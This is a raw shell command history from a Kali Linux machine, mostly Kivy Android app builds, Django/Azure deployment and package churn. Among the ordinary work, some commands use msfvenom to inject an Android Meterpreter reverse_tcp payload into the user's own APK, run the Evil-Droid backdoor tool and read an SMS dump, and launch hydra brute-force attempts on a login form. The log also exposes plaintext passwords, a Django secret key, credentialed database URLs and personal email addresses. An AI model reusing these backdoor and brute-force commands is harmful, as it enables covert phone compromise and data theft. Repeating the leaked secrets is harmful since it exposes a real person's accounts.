  426  echo "Test email" | mail -s "Test subject" nmatoya04@gmail.com\n
  427  sudo tail /var/log/mail.log
  428  sudo gedit /var/log/mail.log
  429  sudo tail -f /var/log/mail.log
  430  ping gmail-smtp-in.l.google.com\nping alt1.gmail-smtp-in.l.google.com\nping alt2.gmail-smtp-in.l.google.com\n
  431  sudo apt-get remove mailutils postfix
  432  sudo apt-get remove --purge mailutils postfix
  433  sudo apt-get install kali-linux-default -y
  434  git clone https://github.com/kivy/buildozer.git\ncd buildozer\nsudo python setup.py install
  435  python3-kivy
  436  sudo apt-get install kivy
  437  sudo apt-get install python-kivy-examples
  438  sudo apt-get install -y python3-dev build-essential libgl1-mesa-dev libgles2-mesa-dev libgstreamer-plugins-base1.0-dev libwebkit2gtk-4.0-dev\n
  439  sudo apt-get install -y gcc\n
  440  sudo apt autoremove
  441  sudo apt-get install -y cython3\n
  442  sudo apt-get install -y cython*
  443  python -m venv .venv
  444  pip install Cython
  445  pip install kivy
  446  python -m pip install "kivy[base]" kivy_examples --no-binary kivy
  447  /home/aegis/Code/team_project/.venv/bin/python /home/aegis/Code/team_project/test_one.py
  448  rm -rf .venv
  449  python test_one.py
  450  sudo apt-get install -y *cython
  451  sudo apt-get install -y *cython*
  452  sudo apt-get install -y python3.11-full
  453  /bin/python /home/aegis/Code/team_project/test_one.py
  454  pip install cython
  455  python -m virtualenv kivy_env
  456  source kivy_env/bin/activate
  457  pip install cython kivy
  458  python3.10
  459  sudo apt-get install python3.10.7
  460  sudo apt-get install python3.10
  461  sudo apt-get install python3.10-minimal
  462  sudo apt-get install -y build-essential libssl-dev zlib1g-dev libncurses5-dev libncursesw5-dev \\nlibreadline-dev libsqlite3-dev libgdbm-dev libdb5.3-dev libbz2-dev libexpat1-dev liblzma-dev \\ntk-dev libffi-dev\n
  463  wget https://www.python.org/ftp/python/3.10.0/Python-3.10.0.tgz
  464  ^[[200~tar -xf Python-3.10.0.tgz
  465  tar -xf Python-3.10.0.tgz\n
  466  wget https://www.python.org/ftp/python/3.10.8/Python-3.10.8.tgz
  467  tar -xf Python-3.10.8.tgz\n
  468  cd Python-3.10.8
  469  ./configure --enable-optimizations
  470  make -j $(nproc) && sudo make altinstall\n
  471  sudo apt-get install -y python3.10-minimal
  472  sudo apt-get install -y python3.10-kivy
  473  pip3.10  install --upgrade pip3.10
  474  pip3.10  install --upgrade pip3.10.8
  475  pip3.10  install django
  476  pip3.10  install kivy 
  477  buildozer android debug deploy run
  478  source ls -a
  479  pip3.10 install wheels ipython 
  480  pip3.10 install cython kivy
  481  python3.10 -m pip install --upgrade pip setuptools virtualenv\n
  482  rm -rf buildozer.spec .buildozer bin 
  483  rm -rf kivy_env
  484  rm -rf buildozer.spec
  485  sudo gedit buildozer.spec
  486  buildozer android release\n
  487  ls ~
  488  keytool -genkeypair -alias aegis -keyalg RSA -keysize 2048 -validity 10000 -keystore my-release-key.jks
  489  gedit py_3_10_8 install instructions.txt
  490  pip install wheel ipython
  491  pip install wheel pytube
  492  gedit yt_playlist_dl.py
  493  msfvenom -x myapp-0.1-arm64-v8a_armeabi-v7a-release-unsigned.apk  -p android/meterpreter/reverse_tcp LHOST=10.1.46.41 LPORT=4444 -o /home/aegis/Downloads/test_back.apk
  494  sudo msfvenom -x myapp-0.1-arm64-v8a_armeabi-v7a-release-unsigned.apk  -p android/meterpreter/reverse_tcp LHOST=10.1.46.41 LPORT=4444 -o /home/aegis/Downloads/test_back.apk
  495  sudo msfvenom -x /home/aegis/myapp-signed.apk -p android/meterpreter/reverse_tcp LHOST=10.1.46.41 LPORT=4444 -o /home/aegis/Downloads/test_back.apk
  496  gedit videos
  497  ls videos/
  498  gedit yt_dl.py
  499  cd ~
  500  cd Tools
  501  cd Evil-Droid_v2
  502  chmod +x ./evil-droid
  503  ./evil-droid
  504  sudo ./evil-droid1
  505  sudo ./evil-droid
  506  cat sms_dump_20230303164724.txt
  507  rm -rf sms_dump_20230303164724.txt evilapk/evilapk.apk
  508  sudo rm -rf sms_dump_20230303164724.txt evilapk/evilapk.apk
  509  rm -rf myapp-0.1-arm64-v8a_armeabi-v7a-release-unsigned.apk
  510  shutdown --reboot now 
  511  sudo systemctl disable postgresql.service
  512  sudo service postgresql status
  513  xampp -q
  514  xampp -H
  515  /bin/python /home/aegis/Code/team_project/main.py
  516  /bin/python -m pip install -U yapf
  517  python3.10 main.py 
  518  python3.10 main.py \
  519  /bin/python -m pip install -U autopep8
  520  sudo apt-get install -y code
  521  sudo apt-get remove --purge code
  522  sudo apt-get autoremove --purge code
  523  rm -rf .config/Code
  524  rm -rf .vscode
  525  rm -rf .cache/chromium/Default/Code\ Cache
  526  sudo apt-get install code 
  527  sudo apt-get install code
  528  sudo apt-get install codeclear
  529  python3 main.py
  530  pip3.10 install wheel ipython 
  531  python3.10 -m pip install --upgrade pip setuptools virtualenv
  532  python3.10 -m pip install --upgrade pip 
  533  pip3.10 install kivy cython buildozer
  534  source .venv/bin/activateactivate
  535  pip3.10 install blackblack
  536  pip3.10 install black
  537  /usr/local/bin/python3.10 /home/aegis/Code/team_project/main.py/usr/local/bin/python3.10 /home/aegis/Code/team_project/main.py
  538  cd Downloads/ZapZap\ Downloads
  539  apksigner sign --ks ~/my-release-key.jks --out ~/myapp-signed.apk bin/myapp-0.1-arm64-v8a_armeabi-v7a-release-unsigned.apk
  540  blueman-sendto -u bin/myapp-0.1-arm64-v8a_armeabi-v7a-release-unsigned.apk -d AC:1E:9E:E9:2F:C1
  541  blueman-sendto -u ~/myapp-signed.apk -d AC:1E:9E:E9:2F:C1
  542  pip install kivymd
  543  /bin/python -m pip install -U black
  544  /usr/local/bin/python3.10 /home/aegis/Code/team_project/signup.py
  545  mkdir form_val
  546  cd form_val
  547  mv ~/Code/team_project/signup.py ./
  548  mv ~/Code/team_project/validation.py ./
  549  mv ~/Code/team_project/auth_backend.py ./
  550  /home/aegis/Code/django_pkms/.venv/bin/python -m pip install -U black
  551  sudo thunar
  552  rm -rf bin/myapp-0.1-arm64-v8a_armeabi-v7a-release-unsigned.apk
  553  apksigner sign --ks ~/my-release-key.jks --out ~/myclient.apk bin/myclient-0.1-arm64-v8a_armeabi-v7a-release-unsigned.apk
  554  nano main.py
  555  pip3.10 install ipython
  556  ipython3.10
  557  ipython3
  558  apksigner sign --ks ~/my-release-key.jks --out ~/myclient_updated.apk bin/myclient-0.1-arm64-v8a_armeabi-v7a-release-unsigned.apk
  559  rm -rf bin/myclient-0.1-arm64-v8a_armeabi-v7a-release-unsigned.apk
  560  apksigner sign --ks ~/my-release-key.jks --out ~/myclient_final.apk bin/myclient-0.1-arm64-v8a_armeabi-v7a-release-unsigned.apk
  561  nano server.py
  562  python3.10 server.py
  563  /usr/local/bin/python3.10 /home/aegis/Code/team_project/main.py
  564  cd team_project
  565  rm -rf bin/
  566  rm -rf buildozer.spec __pycache__/validation.cpython-310.pyc 
  567  rm -rf .buildozer .venv .vscode
  568  rm __pycache__
  569  rm -r __pycache__
  570  mkdir client
  571  mkdir server
  572  cp main.py server
  573  cp main.py client
  574  ls client
  575  ls server
  576  ls server -a
  577  ls client -a
  578  pip3.10 install ipython wheel
  579  pip3.10 install pillow
  580  pip3.10 install buildozer
  581  nano buildozer.spec
  582  pip3.10 install socket
  583  pip3.10 install sockets
  584  rm -rf buildozer.spec*
  585  buildozer android debug
  586  rm -rf bin/myapp-0.1-arm64-v8a_armeabi-v7a-debug.apk
  587  cd Code/team_project/server
  588  buildozer init
  589  rm bin
  590  rm -rf bin .buildozer/
  591  gedit main.py
  592  ls bin
  593  rm bin/myapp-0.1-arm64-v8a_armeabi-v7a-release.aab
  594  gedit buildozer.spec
  595  buildozer android release
  596  apksigner sign --ks ~/my-release-key.jks --out ~/myserver_final.apk bin/myapp-0.1-arm64-v8a_armeabi-v7a-release-unsigned.apk
  597  cat main.py
  598  /usr/local/bin/python3.10 -m pip install -U black
  599  cd Code/team_project/client
  600  find
  601  df -HT /dev/nvme0n1p5
  602  sudo rm -rf Python-3.10.8
  603  python3.10 --version
  604  pip3.10 install kivymd
  605  pip3.10 install kivy
  606  rm -rf Downloads/Young.Sheldon.S06E14.WEBRip.x264.srt
  607  flatpak uninstall eu.betterbird.Betterbird
  608  flatpak uninstall org.mozilla.Thunderbird
  609  flatpak uninstall org.telegram.desktop
  610  flatpak list 
  611  flatpak uninstall com.rtosta.zapzap
  612  ls -lHa
  613  rm -rf .bito .mozilla .cache/tracker3
  614  rm -rf .cache
  615  rm -rf .gphoto .ipython .kivy .buildozer
  616  rm -rf .android
  617  rm -rf .gradle .zoom .var
  618  migrate && serve
  619  cd ~/Code
  620  rm -rf django_pkms
  621  gh repo clone nafdev01/django_pkms
  622  cd django_pkms
  623  pip3 --version
  624  pip install -U pip
  625  pip install djangorestframework
  626  pip install django_bootstrap5 psycopg2
  627  pip3 install apache
  628  pip3 install apache2
  629  server
  630  pip3 install django_bootstrap_icons qrcode
  631  pip3 install pyotp
  632  pip3 install markdown
  633  pip3 install pillow
  634  ls revision/migrations
  651  rm -rf revision/migrations/0001_initial.py
  652  rm -rf glossary/migrations/0001_initial.py
  653  rm -rf accounts/migrations/000*
  654  rm -rf clear
  668  source /home/aegis/Code/django_pkms/.venv/bin/activate
  674  nano glossary/models.py
  681  gedit glossary/models.py
  686  gedit Downloads/Shrek.The.Third.English-WWW.MY-SUBS.CO.srt
  692  flatpak uninstall us.zoom.Zoom
  693  flatpak uninstall org.kde.Platform
  696  python3 client.py
  698  gedit client.py
  699  gedit server.py
  700  python3 server.py
  719  nano course_structure.txt
  720  mv course_structure.txt application_flow.txt
  722  gedit application_flow.txt
  724  exit
  725  blueman-applet
  727  /usr/local/bin/python3.10 /home/aegis/Code/team_project/client/main.py
  729  gedit Downloads/github_desktop_ubuntu.sh
  733  xampp start mariadb
  736  flatpak uninstall ch.imatt.ClipQR
  738  traceroute6 kabarak.ac.ke
  739  traceroute kabarak.ac.ke
  741  traceroute www.kabarak.ac.ke -v
  743  traceroute -H
  744  traceroute --help
  745  traceroute www.kabarak.ac.ke --verbose
  747  traceroute -v
  749  ping www.kabarak.ac.ke
  751  ping www.kabarak.ac.ke -t 4
  755  hping3 www.kabarak.ac.ke
  756  sudo hping3 www.kabarak.ac.ke
  758  traceroute -v www.kabarak.ac.ke
  760  sudo traceroute -d www.kabarak.ac.ke
  762  traceroute -d www.kabarak.ac.ke
  763  ping -c 4 www.kabarak.ac.ke
  764  traceroute www.kabarak.ac.ke
  766  sudo hping3 www.kabarak.ac.ke -V
  768  nano yt_dl.py
  771  python3.10 yt_dl.py
  776  ls videos
  777  rm -rf videos
  780  gedit cybersecurity_creed.txt
  781  ~/./Tools/ngrok/ngrok
  782  ~/./Tools/ngrok/ngrok http 80
  783  ls Tools/ngrok
  786  chmod +x ngrok
  788  ./ngrok http 80
  789  pwd
  790  gedit ~/.zshrc
  791  source ~/.zshrc
  794  snap run ngrok
  795  snap run ngrok http 80
  796  snap alias ngrok
  797  snap remove ngrok
  798  snap warnings
  805  systemctl status apache2.service
  812  thunar
  817  ngrok 
  820  php --info
  821  php --ini
  822  nano /etc/php/8.2/cli/php.ini
  823  sudo gedit /etc/php/8.2/cli/php.ini
  824  php --version
  828  sudo gedit /etc/php/8.2/apache2/php.ini
  829  sudo service apache2 restart
  831  sudo mariadb
  834  ^[[200~sudo apt-get install phpmyadmin
  836  sudo apt-get install phpmyadmin
  838  sudo mariadb -u phpmyadmin
  839  sudo mariadb -u phpmyadmin -p Zahra*2001
  840  sudo mariadb -u phpmyadmin -p phpmyadmin
  841  sudo mariadb -u root
  842  sudo apt-get install mariadb-server
  843  sudo apt-get install mariadb*
  853  sudo service apache2 start
  854  sudo service mariadb start
  855  sudo service mariadb stop
  856  sudo service apache2 stop
  857  xampp start
  859  xampp stop
  862  /usr/local/bin/python3.10 /home/aegis/Code/team_project/server/main.py
  865  cd Videos
  869  python yt_dl.py
  873  python yt_playlist_dl.py
  877  python3.10 main.py
  880  sudo service apache2 start && sudo service mariadb start
  881  sudo service apache2 stop && sudo service mariadb stop
  884  sudo systemctl status postfix
  885  sudo systemctl status snapd.service
  888  xampp --help
  889  /opt/lampp/./manager-linux-x64.run/main.tcl start apache2
  890  /opt/lampp/./manager-linux-x64.run start apache2
  891  sudo /opt/lampp/./manager-linux-x64.run start apache2
  892  sudo /opt/lampp/./manager-linux-x64.run start apache
  893  sudo /opt/lampp/./manager-linux-x64.run status apache
  894  sudo /opt/lampp/./manager-linux-x64.run stop apache
  901  sudo flatpak uninstall io.github.shiftey.Desktop
  902  sudo flatpak uninstall org.kde.Platform
  903  sudo flatpak uninstall org.telegram.desktop
  909  ngrok kill
  910  ngrok end
  911  ngrok http 80
  913  .gitignore
  914  gedit .gitignore
  918  git rm -rf --cached
  919  git rm -rf --cached includes/email_config.inc.php
  922  git commit -m "..."
  923  touch includes/reset_password.inc.php
  924  ls includes
  925  echo $SHELL
  926  echo $HOST
  927  echo $DOTNET_CLI_TELEMETRY_OPTOUT
  928  echo $aliases
  929  echo $argv
  930  echo $HOME
  939  xampp status
  940  xampp status *
  945  rm -rf .git
  947  git branch -m main
  950  xampp stop mysql
  952  xampp stop proftpd
  954  rm -rf .g*
  958  rm -rf ..c
  959  rm -rf .c*
  961  rm -rf .snap .ssh .subversion
  962  rm -rf .java
  963  rm -rf .local
  965  rm -rf .m*
  967  rm -rf .pki .var .vscode
  969  rm -rf .kivy/ .config
  970  rm -rf .zoom
  973  sudo apt-get update -y
  979  gdebi Downloads/google-chrome-stable_current_amd64.deb
  981  sudo apt-get remove --purge google-chrome-stable
  982  sudo gdebi Downloads/google-chrome-stable_current_amd64.deb
  983  google-chrome
  985  sudo apt-get install kdeconnect
  986  sudo apt-get install kdeconnect -y
  988  sudo apt-get install kali-desktop-gnome -y
  992  sudo apt-get autoremove --purge kali-desktop-gnome -y
  993  sudo apt-get autoremove --purge gnome -y
  998  ^[[200~sudo apt-get dist-upgrade
 1002  sudo apt-get dist-upgrade
 1007  sudo apt-get remove kali-desktop-xfce
 1010  sudo -i
 1011  sudo apt-get install --reinstall kali-desktop-xfce
 1012  sudo apt-get install --reinstall kali-desktop-base
 1013  sudo apt-get install --reinstall kali-desktop-core
 1014  sudo apt-get install --reinstall kali-desktop-gnp
 1015  sudo apt-get install --reinstall kali-desktop-gnome
 1016  sudo apt-get install --reinstall gnome
 1017  sudo apt-get install --reinstall xfce4
 1018  sudo apt-get install --reinstall xfce4-windowck-plugin
 1019  sudo apt-get remove --purge xfce4
 1020  sudo apt-get remove --purge gnome-*
 1021  sudo apt-get remove --purge xfce4-*
 1022  shutdown --poweroff now
 1023  sudo apt-get remove --purge kali-desktop-gnome -y
 1024  sudo apt-get remove --purge kali-desktop-* -y
 1025  sudo apt-get remove --purge desktop-*
 1026  sudo apt-get autoremove --purge desktop-*
 1027  sudo apt-get autoremove --purge desktop-base
 1029  reset 
 1032  sudo apt-get remove --purge xserver-common
 1033  sudo apt-get remove --purge xserver-*
 1035  sudo apt-get remove --purge x11-common
 1036  sudo apt-get remove --purge x11-xserver-utils
 1038  sudo apt-get remove --purge gdm3
 1039  sudo apt-get remove --purge lightdm
 1040  sudo apt-get autoremove --purge gdm3
 1041  sudo apt-get clean
 1044  sudo apt-get install kali-desktop-xfce -y
 1054  sudo apt-get install xfwm4
 1055  sudo apt-get install --reinstall\ xfwm4
 1056  sudo apt-get install --reinstall xfwm4
 1058  cd ~/.cache/sessions
 1061  sudo apt-get install kali-linux-default
 1062  sudo apt-get install kali-linux-labs
 1064  sudo apt-get remove --purge virtualbox*
 1066  sudo apt-get install virtualbox*
 1071  sudo netdiscover -i wlan0 -r 10.1.45.172/22
 1072  sudo netdiscover -i wlan0 
 1073  ping 10.1.45.172/22
 1074  ping 10.1.45.172
 1078  kdeconnect-app
 1081  cd Tools/ngrok
 1084  gh auth login
 1085  gh repo clone cyberark/EasyPeasy
 1086  powershell-empire
 1087  sudo powershell-empire
 1089  ps
 1090  pwsh
 1092  cd EasyPeasy
 1094  cd \\easypeasy
 1101  rm -rf .cache .mozilla 
 1102  df -HT / 
 1103  du
 1104  du -sh VirtualBox\ VMs
 1105  du -sh VirtualBox\ VMs/Metasploitable
 1106  du -sh VirtualBox\ VMs/Metasploitable2-Linux
 1107  rm -rf VirtualBox\ VMs/Metasploitable2-Linux
 1108  rm -rf VirtualBox\ VMs/WInXP
 1109  du -sh VirtualBox\ VMs/PfSense
 1110  du -sh VirtualBox\ VMs/kali-linux-2022.4-virtualbox-amd64
 1111  du -sh /mnt/C45AC4E35AC4D37A
 1113  mkdir /mnt/C45AC4E35AC4D37A/Users/nafta/  VirtualBox\ VMs
 1114  mkdir /mnt/C45AC4E35AC4D37A/Users/nafta/VirtualBox\ VMs
 1115  df -HT /mnt/C45AC4E35AC4D37A 
 1117  rm -rf VirtualBox\ VMs/kali-linux-2022.4-virtualbox-amd64
 1119  cd .cache/sessions
 1120  rm -rf xf*
 1122  sudo apt-get install wps
 1123  sudo apt-get install --resintall wps-office
 1124  sudo apt-get install --reinstall wps-office
 1125  xampp stop apache
 1127  sudo apt-get install gnome-software* 
 1128  flatpak remote-add --if-not-exists flathub https://flathub.org/repo/flathub.flatpakrepo
 1129  sudo apt-get install snap*
 1131  sudo apt-get install xfce4
 1132  sudo apt-get install xfce4-appfinder
 1134  clearclear
 1138  xampp status apache
 1139  xampp status mysql
 1140  xampp status proftpd
 1145  nano Code/msdocs-django-postgresql-sample-app/.env
 1146  sudo apt-get install azure-cli
 1149  gedit azure.txt
 1152  git clone https://github.com/Azure-Samples/djangoapp
 1153  az postgres flexible-server create --resource-group myresourcegroup --location westus2
 1154  az webapp up --resource-group myresourcegroup --location westus2 --plan DjangoPostgres-tutorial-plan --sku B1 --name testapp
 1156  cd djangoapp
 1157  az webapp up --resource-group myresourcegroup --location westus2 --plan DjangoPostgres-tutorial-plan --sku B1 --name djangoapp
 1160  rm djangoapp
 1161  rm -rf djangoapp
 1165  touch .env
 1167  mv .env.sample .env
 1173  sudo service postgresql start
 1175  sudo -U psql 
 1176  sudo -U psql postgres
 1177  sudo psql
 1178  sudo psql template
 1179  sudo -U postgres 
 1180  sudo -U psql postgres 
 1181  sudo - psql postgres 
 1182  sudo -u psql postgres 
 1183  sudo -u postgres 
 1186  cp .env .env.sample
 1189  ls restaurant_review/migrations/000*
 1202  rm -rf Code/msdocs-django-postgresql-sample-app
 1203  cd Code/
 1213  nano .env
 1214  cp .env .env.sample 
 1215  nano .env.sample
 1218  # Run database migration\nsudo python manage.py migrate\n# Run the app at http://127.0.0.1:8000\npython manage.py runserver
 1222  python manage.py migrate
 1226  rm -rf msdocs-django-postgresql-sample-app
 1227  git clone https://github.com/Azure-Samples/msdocs-django-postgresql-sample-app.git
 1228  cd msdocs-django-postgresql-sample-app
 1233  cp .env.sample .env 
 1234  python3 -m venv .venv\nsource .venv/bin/activate
 1235  pip install -r requirements.txt
 1237  rm -rf .env.sample
 1238  # Run database migration\npython manage.py migrate\n# Run the app at http://127.0.0.1:8000\npython manage.py runserver
 1241  az webapp ssh -n msdocs-python-postgres-nom -g msdocs-python-postgres-tutorial
 1244  cd Code/msdocs-django-postgresql-sample-app
 1247  git config --global user.name "nafdev01"
 1248  git config --global user.email  "naftaldev@gmail.com"
 1249  az login
 1250  az postgres flexible-server create --resource-group pkmsresourcegroup --location eastus2
 1254  pip install whitenoise
 1255  pip install psycopg2-binary
 1256  pip install python-dotenv
 1257  migrate
 1258  python3 --version
 1259  "media" > .gitignore
 1260  echo "media" > .gitignore
 1261  nano .gitignore
 1262  git fetch
 1263  git pull
 1264  git pull --no-rebase
 1266  cat .gitignore
 1268  git reset
 1270  git reset origin/main
 1271  git reset origin/HEAD
 1273  pip uninstall psycopg2
 1274  pip install psycopg2
 1275  echo "export SECRET_KEY='$(openssl rand -hex 40)'" > .DJANGO_SECRET_KEY && source .DJANGO_SECRET_KEY
 1276  cat .DJANGO_SECRET_KEY
 1277  pip install httpie
 1280  nohup python manage.py runserver &
 1281  nohup python manage.py runserver
 1283  nano requirements.txt
 1290  cd Code/django_pkms
 1292  pip install gunicorn psycopg2-binary dj-database-url
 1294  jobs -l
 1295  sudo apt update\nsudo apt install python3-venv python3-dev libpq-dev postgresql postgresql-contrib nginx curl
 1300  pip install django gunicorn psycopg2-binary dj-database-url
 1301  git config pull.rebase true
 1302  git config pull.ff true
 1303  git rm -rf --cached .
 1304  git reset origin
 1305  git reset main
 1306  git config pull.rebase false
 1307  git pull origin main
 1308  git add .
 1309  git commit -m "Initial Commit"
 1312  pip freeze > requirements.txt
 1314  nano django_pkms/settings.py
 1315  gedit django_pkms/settings.py
 1322  sudo gdebi Downloads/zoom_amd64.deb -y
 1323  gdebi help
 1324  gdebi --help
 1325  sudo gdebi -i Downloads/zoom_amd64.deb
 1326  sudo gdebi Downloads/zoom_amd64.deb
 1328  export DATABASE_URL=postgresql://scholar:cholar_sec@2001*@localhost:5432/coursework
 1329  export DATABASE_URL="postgresql://scholar:cholar_sec@2001*@localhost:5432/coursework"
 1330  export DATABASE_URL="postgresql://scholar:scholar_sec@2001*@localhost:5432/coursework"
 1331  export DATABASE_URL="postgresql://scholar:cholar_sec@\@2001\*@localhost:5432/coursework"
 1332  export DATABASE_URL="postgresql://scholar:scholar_sec@2001\*@localhost:5432/coursework"
 1333  export DATABASE_URL="postgresql://scholar:\!-scholar_sec@\@2001\*@localhost:5432/coursework"\n
 1334  sudo -u postgres psql
 1336  git add . django_pkms/settings.py
 1337  git commit -m "Updated Email"
 1339  export SECRET_KEY="django-insecure-7ppocbnx@w71dcuinn*t^_mzalt@o01v3fee27g%rg18fc5d@"
 1340  export DEVELOPMENT_MODE="False"
 1341  export DEVELOPMENT_MODE=
 1342  export DEVELOPMENT_MODE
 1343  django-admin collectstatic
 1344  python3 manage.py check
 1346  export DEBUG="False"
 1347  python3 manage.py collectstatic 
 1350  xampp 
 1351  cd htdocs
 1352  cp -r * /opt/lampp/htdocs
 1353  mv * /opt/lampp/htdocs
 1354  mv -r * /opt/lampp/htdocs
 1355  xampp
 1357  xampp start proftpd
 1360  cd /opt/lampp/htdocs
 1364  git init
 1365  sudo service apache2 status
 1367  git status
 1368  git remote add https://github.com/E-bambino/login-page.git
 1369  git remote add git remote add origin https://github.com/example/example.git
 1370  git remote add origin https://github.com/example/example.git
 1371  git remote remove origin
 1372  git remote show
 1373  git remote add origin https://github.com/E-bambino/login-page.git
 1374  git push origin main
 1380  export DATABASE_URL="postgresql://scholar:ScholarPass@localhost:5432/coursework"\n
 1382  sudo service mysql status
 1384  sudo apt-get install kali-themes-purple
 1385  arkime
 1389  snort
 1390  sudo apt-get install selinux-basics
 1391  sudo sestatus
 1392  sudo apt-get install snort
 1393  sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys 3B4FE6ACC0B21F32
 1394  sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys 871920D1991BC93C
 1395  sudo apt update
 1396  sudo apt-get upgrad
 1397  sudo gedit /etc/apt/sources.list.d/kali.list
 1398  sudo gedit /etc/apt/sources.list
 1399  sudo apt-key del 3B4FE6ACC0B21F32
 1400  sudo apt-key del 871920D1991BC93C
 1402  sudo apt-get upgrade
 1405  sudo apt install -y gcc libpcre3-dev zlib1g-dev libluajit-5.1-dev 
 1406  sudo apt install -y gcc libpcre3-dev zlib1g-dev libluajit-5.1-dev libpcap-dev openssl libssl-dev libnghttp2-dev libdumbnet-dev 
 1407  sudo apt install -y gcc libpcre3-dev zlib1g-dev libluajit-5.1-dev libpcap-dev openssl libssl-dev libnghttp2-dev libdumbnet-dev bison flex libdnet autoconf libtool
 1408  sudo apt install -y gcc libpcre3-dev zlib1g-dev libluajit-5.1-dev libpcap-dev openssl libssl-dev libnghttp2-dev libdumbnet-dev bison flex autoconf libtool
 1409  mkdir ~/snort_src && cd ~/snort_src
 1410  tar -xvcf ~/Downloads/daq-2.0.7.tar.gz
 1411  tar -xvcf ~/Downloads/daq-2.0.7.tar.gz daq-2.0.7/
 1412  tar -xvf ~/Downloads/daq-2.0.7.tar.gz daq-2.0.7/
 1413  cd daq-2.0.7
 1414  autoreconf -f -i
 1415  ./configure && make && sudo make install
 1416  cd ~/snort_src
 1417  tar -xvf ~/Downloads/snort-2.9.20.tar.gz snort-2.9.20/
 1419  cd snort-2.9.20
 1420  ./configure --enable-sourcefire && make && sudo make install
 1421  sudo ldconfig
 1422  cd 
 1423  rm -rf snort_src
 1424  sudo apt install postgresql-15
 1425  sudo apt install qml-module-qt-labs-folderlistmodel
 1426  sudo apt upgrade
 1427  sudo apt dist-upgrade
 1430  xampp start apache2
 1432  hydra
 1433  hydra-wizard
 1434  hydra -l mnaftal -p Zahra*2001 -u  -s 80  'http://localhost/parent_login.php' http-post-form
 1435  hydra -l mnaftal -p Zahra*2001 -s 80 http-post-form://localhost/parent_login.php
 1436  hydra -l mnaftal -p Zahra*2001 -s 80 http-post-form://localhost/parent_login.php "username=^USER^&password=^PASS^&submit=Login:Incorrect username or password
 1437  hydra -l mnaftal -p Zahra*2001 -s 80 http-post-form://localhost/parent_login.php "username=^USER^&password=^PASS^&submit=Login:Incorrect username or password\n"
 1438  hydra -l mnaftal -p Zahra*2001 -s 80 http-post-form://localhost/parent_login.php "username=^USER^&password=^PASS^&submit=Login:Incorrect username or password"
 1441  sudo apt-get install geoipupdate
 1442  sudo apt-get install arkime
 1443  arkime-first-setup
 1444  sudo arkime-first-setup
 1446  rm -rf black/ flatpak mozilla gnome-software obexd gstreamer-1.0 zoom
 1449  rm -rf .mozilla 
 1450  rm -rf .azure .BurpSuite .zoom 
 1452  sudo su
 1455  sudo apt-get install zeek
 1456  sudo apt-get install assetfinder
 1457  sudo apt-get install assetfinder witnessme tripwire -y
 1458  sudo apt-get install zaproxy -y
 1459  sudo apt-get install redeye -y
 1460  sudo apt-get install dscan cyberchef defectdojo -y
 1461  sudo apt-get install pack2 Unicrypto -y
 1462  sudo apt-get install pack2 unicrypto -y
 1463  sudo apt-get install pack2 -y
 1467  redeye-stop
 1468  pack2
 1469  defectdojo
 1470  sudo defectdojo
 1474  defectdojo-stop
 1475  sudo defectdojo-stop
 1476  xampp start apache
 1477  xampp start mysql
 1484  sudo apt-get remove --purge zeek assetfinder witnessme tripwire redeye dscan
 1485  sudo apt-get autoremove --purge zeek assetfinder witnessme tripwire redeye dscan
 1486  sudo apt-get autoremove 
 1487  sudo apt-get autoclean 
 1489  df -HT /home/
 1491  sudo apt-get install kali-tools-identify
 1492  sudo apt-get remove --purge kali-tools-identify
 1493  sudo apt-get remove zaproxy
 1494  sudo apt-get remove defectdojo
 1495  sudo apt-get remove arkime
 1496  sudo apt-get remove pack2
 1501  sudo apt-get upgrade -y --download-only
 1503  sudo apt-get dist-upgrade -y --download-only
 1510  cd .cache/
 1511  rm -rf sessions/xf*
 1513  redeye
 1514  ifconfig wlan0
 1519  sudo apt-get install virtualbox* -y
 1520  sudo apt-get install --reinstall virtualbox* -y
 1524  nessus
 1525  sudo gdebi Downloads/Nessus-10.5.0-ubuntu1404_amd64.deb
 1526  systemctl start nessusd.service
 1527  sudo systemctl start nessusd.service
 1528  sudo apt-get remove --purge nessus 
 1529  sudo systemctl stop nessusd.service
 1530  tigervncsession
 1531  tigerdeep
 1532  remmina
 1533  sudo apt-get install remmina
 1534  sudo apt-get remove --purge remmina* 
 1536  sudo apt-get autoremove
 1539  shutdown --reboot now
 1542  python3 yt_dl.py 
 1548  /home/aegis/Code/team_project/.venv/bin/python /home/aegis/Code/team_project/auth_pages/login.py
 1549  /home/aegis/Code/team_project/.venv/bin/python /home/aegis/Code/team_project/trial.py
 1551  sudo apt-get dist-upgrade -y/home/aegis/Code/team_project/.venv/bin/python /home/aegis/Code/team_project/pyqt5/login.py
 1552  /home/aegis/Code/team_project/.venv/bin/python /home/aegis/Code/team_project/pyqt5/login.py
 1555  python3.10 pyqt5/chat.py
 1559  python3.10 pyqt5/login.py
 1563  /home/aegis/Code/team_project/.venv/bin/python /home/aegis/Code/team_project/pyqt5/chat.py
 1564  qtdiag
 1565  qt
 1568  sudo apt-get install qt5-image-formats-plugins
 1569  sudo apt-get install qt5-styles-ukui
 1570  sudo apt-get install qtbase5
 1571  sudo apt-get install qtbase5-*
 1572  sudo apt-get install qtbase5-dev
 1573  sudo apt-get install qt5*
 1574  sudo apt-get install qtbase5-examples
 1575  qt5ct 
 1576  qtchooser
 1577  qr
 1578  qr --help
 1582  python3.10 yt_playlist_dl.py
 1583  nano yt_playlist_dl.py
 1584  pip install youtube_dl
 1585  cat yt_playlist_dl.py
 1587  import youtube_dl
 1590  sudo apt-get install qttools5-dev-tools
 1591  python3 yt_playlist_dl.py
 1596  python3 login.py
 1599  pip freeze
 1601  python build-demo.py --verbose
 1602  chmod +x Downloads/qt-unified-linux-x64-4.5.2-online.run
 1603  ./Downloads/qt-unified-linux-x64-4.5.2-online.run
 1605  source ../.venv/bin/activate
 1608  python build-demo.py
 1609  cat login.py
 1611  mv login.py qtlogin/
 1612  mv login.py qtlogin/login.py
 1613  cp login.py qtlogin/login.py
 1614  mkdir qtchat
 1615  cp login.py qtchat/login.py
 1616  ls qtchat
 1617  ls qtchat/login.py 
 1618  ls qtchat 
 1619  ls -lH qtchat 
 1620  ndk
 1621  sudo apt update && sudo apt install git cmake ninja-build python python3-distutils openjdk-8-jdk qemu-kvm
 1622  sudo apt install git cmake ninja-build python python3-distutils openjdk-8-jdk qemu-kvm
 1623  sudo apt install git cmake ninja-build python python3-distutils openjdk-11-jdk
 1624  sudo apt install git cmake ninja-build python3-distutils openjdk-11-jdk
 1629  /home/aegis/Code/pyqt5/.venv/bin/python /home/aegis/Code/pyqt5/login.py
